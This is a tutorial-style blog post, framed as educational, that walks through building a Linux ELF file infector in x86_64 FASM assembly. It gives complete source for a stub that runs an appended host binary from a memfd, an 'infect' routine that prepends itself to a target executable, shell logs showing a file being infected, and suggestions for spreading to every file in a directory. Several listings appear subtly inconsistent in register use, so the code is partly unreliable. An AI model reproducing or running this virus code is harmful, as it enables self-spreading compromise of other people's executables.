Introduction

There are many approaches to ELF file infection. Some of them are better, some of them are worse. In the end, the worst way to mess up is simply breaking the program that is being infected so that it no longer functions properly. The techniques that are relatively easy to find on the internet have numerous flaws that sometimes make it difficult to infect a program without destroying it. If one appends a new section or an ELF program header, there is always a nonzero chance that the ELF file is structured in a peculiar way or depends on the offsets in the file in such a manner that it ceases to work correctly (as an entry must be inserted into the ELF program header/section table, the entire ELF file must be moved to make room for it). Other infectors choose to wrap the original program and call it during the runtime, but I am not particularly fond of their implementations either - they often rely on temporary files, which obstruct argv[0] (and more), disrupt passing argv, argp and extensively utilise libc drastically increasing the file size, etc…

It is evident that the most logical choice for me is to finally provide an educational resource on an ELF infector that is (largely) foolproof.

The game plan

I would like to create a program (ideally using x86_64 assembly language compiled using FASM for a small size out of the box) to which an ELF file can be appended and then executed by the program when ran. In general, if the path to an ELF file is known, it can be easily executed while maintaining the values of argc, argv, and argp:

format ELF64 executable
use64

sys_execve equ 59

entry _start

stuff: db "/usr/bin/sh", 0
_start:
    ; Load the path to the executable
    mov rdi, stuff
    ; Prepare to call execve
    ; Load argc + argv
    lea rsi, [rsp + 8]
    ; Load argp
    mov rdx, [rsp]
    lea rdx, [rsp+8 + rdx*8 + 8]
    ; Perform the syscall
    mov rax, sys_execve
    syscall

Clearly, I could take an additional step and sketch a traditional “bad” ELF infector that extracts an ELF file attached to it and executes it. However, I will skip this step as it is a waste of time. Instead, I will utilize memfd_create to create a memory-backed file descriptor, insert the ELF file contents into it using sendfile, and pass "/proc/self/fd/..." as an argument to execve.

An implementation

Let’s start with our previous “skeleton” and expand upon it.

format ELF64 executable
use64

; XXX: You have to set this to the resulting ELF file size manually.
SIZE equ ??

sys_execve equ 59
sys_open equ 2
sys_lseek equ 8
sys_memfd_create equ 319
sys_sendfile equ 40
sys_close equ 3

entry _start

memfd_path: db "/proc/self/fd/", 0, 0

self: db '/proc/self/exe', 0
empty: db 0
size: dq SIZE

load_elf:
    sub rsp, 8
    ; Open ourselves.
    xor esi, esi
    mov edi, self
    mov rax, sys_open
    syscall
    ; Obtain the length: seek to back.
    mov r8, rax
    mov rdi, r8
    mov rax, sys_lseek
    syscall
    ; Ok, now rewind the file to the beginning.
    mov r10, rax
    mov rdx, rsi
    mov rax, r9
    syscall
    ; Call memfd_create, call with MFD_CLOEXEC.
    mov edi, empty
    mov esi, 1
    mov rax, sys_memfd_create
    syscall
    ; Copy the file contents to the memfd using sendfile.
    mov edx, size
    mov r9, rax
    mov rdi, rax
    mov rsi, r8
    sub r10d, SIZE
    mov rax, sys_sendfile
    syscall
    ; Close the file descriptor we hold to our own binary.
    mov eax, sys_close
    mov rdi, r8
    syscall
    ; Bravely assume that the memfd descriptor number is a single digit.
    ; This might or might not work reliably, but improving upon it is
    ; trivially beyond the scope of this post.
    add r9d, 48
    mov BYTE [memfd_path + 14], r9b
    mov BYTE [memfd_path + 15], 0
    add rsp, 8
    ret

_start:
    ; Load the executable to a memfd.
    call load_elf
    ; Load the path to the executable
    mov rdi, memfd_path
    ; Prepare to call execve
    ; Load argc + argv
    lea rsi, [rsp + 8]
    ; Load argp
    mov rdx, [rsp]
    lea rdx, [rsp+8 + rdx*8 + 8]
    ; Perform the syscall
    mov rax, sys_execve
    syscall

I have confirmed that my code works as intended:

 0 ~/workspace % fasm stub.asm
flat assembler  version 1.73.30  (16384 kilobytes memory)
2 passes, 323 bytes.
 0 ~/workspace % cat /usr/bin/sh >> stub
 0 ~/workspace % export A=5
 0 ~/workspace % ./stub
$ echo $A
5
$ exit 4
 4 ~/workspace % ./stub -invalid
./stub: 0: Illegal option -d
 2 ~/workspace %

x86_64 assembly code golf.

It is somewhat disturbing that a program this simple requires more than 320 bytes of machine code, so I will put forth some effort to make it smaller. I will utilize a few cheap tricks I have learned over the years, but I believe that explaining them falls outside the scope of this particular post (please stay tuned!). Ultimately, the size of the file was reduced to approximately 267 bytes. I have also added a payload stub call that will be useful in the future.

format ELF64 executable
use64

; XXX: You have to set this to the resulting ELF file size manually.
SIZE equ ??

sys_execve equ 59
sys_open equ 2
sys_lseek equ 8
sys_memfd_create equ 319
sys_sendfile equ 40
sys_write equ 1
sys_close equ 3

entry _start

memfd_path: db '/proc/self/fd/',0,0
self: db '/proc/self/exe'
empty: db 0
size: dq SIZE

load_elf:
    ; Open ourselves.
    xor esi, esi
    mov edi, self
    push sys_open
    pop rax
    syscall
    ; Obtain the length: seek to back.
    mov r8, rax
    mov rdi, r8
    push sys_lseek
    pop rax
    syscall
    ; Call memfd_create, call with MFD_CLOEXEC.
    mov edi, empty
    push 1
    pop rsi
    push sys_memfd_create
    pop rax
    syscall
    ; Copy the file contents to the memfd using sendfile.
    mov edx, size
    mov r9, rax
    mov rdi, rax
    mov rsi, r8
    sub r10d, SIZE
    push sys_sendfile
    pop rax
    syscall
    ; Close the file descriptor we hold to our own binary.
    push sys_close
    pop rax
    mov rdi, r8
    syscall
    ; Bravely assume that the memfd descriptor number is a single digit.
    ; This might or might not work all of the times, but improving upon
    ; this is trivially beyond the scope of this post.
    add r9d, 48
    mov BYTE [memfd_path + 14], r9b
    ret

payload:
    ; Generally speaking, the payload code goes here.
    ret

_start:
    ; Run the virus code.
    call payload
    ; Load the executable to a memfd.
    call load_elf
    ; Load the path to the executable
    mov rdi, memfd_path
    ; Prepare to call execve
    ; Load argc + argv
    lea rsi, [rsp + 8]
    ; Load argp
    mov rdx, [rsp]
    lea rdx, [rsp+8 + rdx*8 + 8]
    ; Perform the syscall
    push sys_execve
    pop rax
    syscall

Infecting files.

Simply speaking, you are supposed to put “your own” code inside the payload function of the stub, but for completness, I will illustrate a way of infecting an executable file from within the payload function. It has a few issues: it may reinfect files, the ELF file detection is not that good and it always infects a single, hard-coded file. However, it is a good starting point for further experiments.

; Infect a file. Take the name in `rdi`.
infect:
    ; Reserve some space on the stack for the buffer.
    sub rsp, 944
    ; Open `rdi`.
    push sys_open
    pop rbx
    mov rsi, rbx
    mov rax, rbx
    syscall
    ; Read the ELF header.
    mov r9d, eax
    lea rsi, [rsp - 128]
    ; Read 64 bytes.
    push 64
    pop rdx
    mov rdi, r9
    ; Notice: we're using `rax` as the syscall number here.
    ; 0 is the syscall number for `read`, hence I did not define it
    ; to save a few bytes.
    xor eax, eax
    syscall
    ; Verify the file header.
    movq xmm0, qword [rsi]
    movd eax, xmm0
    ; 0x7F and the magic 0x464C45 ("ELF").
    cmp eax, 0x464C457F
    jne .no_infect
    ; Check the amount of sections. Our dropper/stub
    ; has no sections, so we will assume that the file
    ; with no sections has been infected already.
    ; There are better ways, but they require more
    ; implementation effort.
    cmp word [rsp - 68], 0
    je .no_infect
    ; Open the current executable.
    ; RBX is still sys_open.
    mov rdi, self
    xor esi, esi
    mov rax, rbx
    syscall
    ; Open a memfd. 
    mov r10d, eax
    mov rdi, empty
    push sys_memfd_create
    pop rax
    mov rsi, r8
    syscall
    ; Copy the infection stub to the memfd.
    mov ebx, eax
    ; Buffer. Read the infection stub here and write it to the memfd.
    lea r15, [rsp - 64]
    ; Read SIZE bytes from ourselves.
    mov edx, SIZE
    mov rdi, r10
    mov rsi, r15
    xor eax, eax
    syscall
    ; Write them to the memfd: this is the ELF stub.
    mov edx, SIZE
    mov rdi, rbx
    mov rax, r8
    syscall
    ; Seek to the beginning of the the goat file.
    ; We have read the ELf headers, but we need them back.
    push sys_lseek
    pop r14
    mov rdi, r9
    xor esi, esi
    xor edx, edx
    mov rax, r14
    syscall
    ; Copy the goat file to the memfd in SIZE-big chunks.
.copygoat:
    ; Read SIZE bytes from the goat file.
    mov edx, SIZE
    mov rdi, r9
    mov rsi, r15
    xor eax, eax
    syscall
    ; Check if we have read more than 0 bytes.
    mov rdi, rbx
    test rax, rax
    jle .copygoat_end
    ; Write the data to the memfd now.
    mov rsi, r15
    mov rdx, rax
    mov rax, r8
    syscall
    ; Loop.
    jmp .copygoat
.copygoat_end:
    ; Seek to the beginning of the memfd and the goat file.
    xor esi, esi
    xor edx, edx
    mov rax, r14
    syscall
    mov rdi, r9
    mov rax, r14
    syscall
    ; Load the buffer again.
    lea rsi, [rsp - 64]
.copymemfd:
    ; Read SIZE bytes from the memfd file.
    mov edx, SIZE
    mov rdi, rbx
    xor eax, eax
    syscall
    ; Check if we have read more than 0 bytes.
    test rax, rax
    jle .copymemfd_end
    ; Write the data to the goat file.
    mov rdi, r9
    mov rdx, rax
    mov rax, r8
    syscall
    jmp .copymemfd
.copymemfd_end:
    ; Close all the file descriptors.
    ; RAX gets trashed so we need to save the syscall# elsewhere.
    push sys_close
    pop rdx
    mov rdi, rbx
    mov rax, rdx
    syscall
    mov rdi, r9
    mov rax, rdx
    syscall
    mov rdi, r10
    mov rax, rdx
    syscall
.no_infect:
    add rsp, 944
    ret

; Name of the file we want to infect.
inf: db "goat", 0
msg: db 'This file is infected.', 10, 0
payload:
    ; Print the "This file is infected." message.
    mov rsi, msg
    push sys_write
    pop r8
    mov rdx, 23
    mov rdi, r8
    mov rax, r8
    syscall
    ; Infect the file.
    mov rdi, inf
    jmp infect

Conclusion

The program I have presented is not particularly stealthy or advanced at present, but I believe that it serves as a good example of a technique for infecting ELF files. Some potential enhancements to consider include:

  • Listing the files in the current directory and infecting all of them.
  • Modifying an unused ELF header field to indicate that the file has been infected, rather than relying on the fact that the stub has no sections.
  • Making further improvements to the code size.
  • Compressing the stub once the payload becomes large enough

Finally, the following shell log demonstrates the capabilities of the program:

 ~/workspace % fasm stub.asm
flat assembler  version 1.73.30  (16384 kilobytes memory)
3 passes, 623 bytes.
 ~/workspace % # Pretend to be unzip:
 ~/workspace % cat /usr/bin/unzip >> stub
 ~/workspace % echo "int main(){}" > goat.c
 ~/workspace % gcc goat.c -o goat
 ~/workspace % ./goat
 ~/workspace % ./stub
This file is infected.
UnZip 6.00 of 20 April 2009, by Debian. Original by Info-ZIP.

Usage: unzip [-Z] [-opts[modifiers]] file[.zip] [list] [-x xlist] [-d exdir]
  Default action is to extract files in list, except those in xlist, to exdir;
  file[.zip] may be a wildcard.  -Z => ZipInfo mode ("unzip -Z" for usage).

  -p  extract files to pipe, no messages     -l  list files (short format)
  -f  freshen existing files, create none    -t  test compressed archive data
  -u  update files, create if necessary      -z  display archive comment only
  -v  list verbosely/show version info       -T  timestamp archive to latest
  -x  exclude files that follow (in xlist)   -d  extract files into exdir
modifiers:
  -n  never overwrite existing files         -q  quiet mode (-qq => quieter)
  -o  overwrite files WITHOUT prompting      -a  auto-convert any text files
  -j  junk paths (do not make directories)   -aa treat ALL files as text
  -U  use escapes for all non-ASCII Unicode  -UU ignore any Unicode fields
  -C  match filenames case-insensitively     -L  make (some) names lowercase
  -X  restore UID/GID info                   -V  retain VMS version numbers
  -K  keep setuid/setgid/tacky permissions   -M  pipe through "more" pager
See "unzip -hh" or unzip.txt for more help.  Examples:
  unzip data1 -x joe   => extract all files except joe from zipfile data1.zip
  unzip -p foo | more  => send contents of foo.zip via pipe into program more
  unzip -fo foo ReadMe => quietly replace existing ReadMe if archive file newer
 ~/workspace % ./goat
This file is infected.
 ~/workspace %